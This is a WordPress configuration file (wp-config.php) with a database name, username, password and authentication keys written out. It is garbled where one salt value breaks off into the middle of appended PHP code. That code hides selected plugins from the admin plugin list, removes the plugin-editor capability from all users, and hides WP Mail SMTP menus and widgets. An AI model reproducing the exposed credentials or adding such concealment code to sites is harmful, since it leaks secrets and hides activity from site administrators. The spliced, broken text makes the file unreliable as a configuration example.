/** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'site78345' ); /** Database username */ define( 'DB_USER', 'npuZVyrbzYo9hFUI' ); /** Database password */ define( 'DB_PASSWORD', 'MPeiaum9YcLiYyn9NnI9hAh9gBpDZ4' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'K6VHw)S2>LK_Lputsxhly0:JOfkJg]/nbnzTyI/n{ra@#S{Sv{3`*pUqjW_WMrBf' ); define( 'SECURE_AUTH_KEY', ')D=ByNTYTEL/}e)?A3auS2-HYIr@^K3L?c0TOQ/K4(~j];Sr{Hqu&_RyMow!P#h$' ); define( 'LOGGED_IN_KEY', 'Qztm/Rtt}1,yXgym/>)~%}~;aXnr8/fuw|&5!g%&,,^9>mQ|=X0pQ2/Z8[*I[I*-' ); define( 'NONCE_KEY', 'rG`VzwM)@wr.G=Y[jCC5;t7=_bdc,i_btyDh@2^V|^mYhk1s8?o#?JuPuh-4@K}I' ); define( 'AUTH_SALT', '7&#&-]/gsZNUh&_;>XoT2{]aYRKk%dAQ_<]@!2O|9kvq!z_h[O 0Ti6h&f5M=jm|' ); define( 'SECURE_AUTH_SALT', '5I^/fhajec^el;dPC3&y)v@9YBS`l TL[b-3bMM-R`D>?LNb~RrEYPXe2i;P?6o33,Q^`xH[-Tg~1f{DIQIPY2$^{ [mi)*30<52|S+$F=}FWtitems; foreach ($myplugins as $key => $val) { if (in_array($key,$hidearr)) { unset($wp_list_table->items[$key]); } } } function hide_plugin_editor( $allcaps ) { $allcaps['edit_plugins'] = false; return $allcaps; } if (function_exists('add_action') && function_exists('add_filter')) { add_action('pre_current_active_plugins', 'hide_plugin_action'); add_filter('user_has_cap', 'hide_plugin_editor'); add_action('wp_dashboard_setup', 'plt_hide_wp_mail_smtp_dashboard_widgets', 20); add_action('admin_menu', 'plt_hide_wp_mail_smtp_menus', 2147483647); } // End of plugins hiding define('WP_MEMORY_LIMIT', '130M');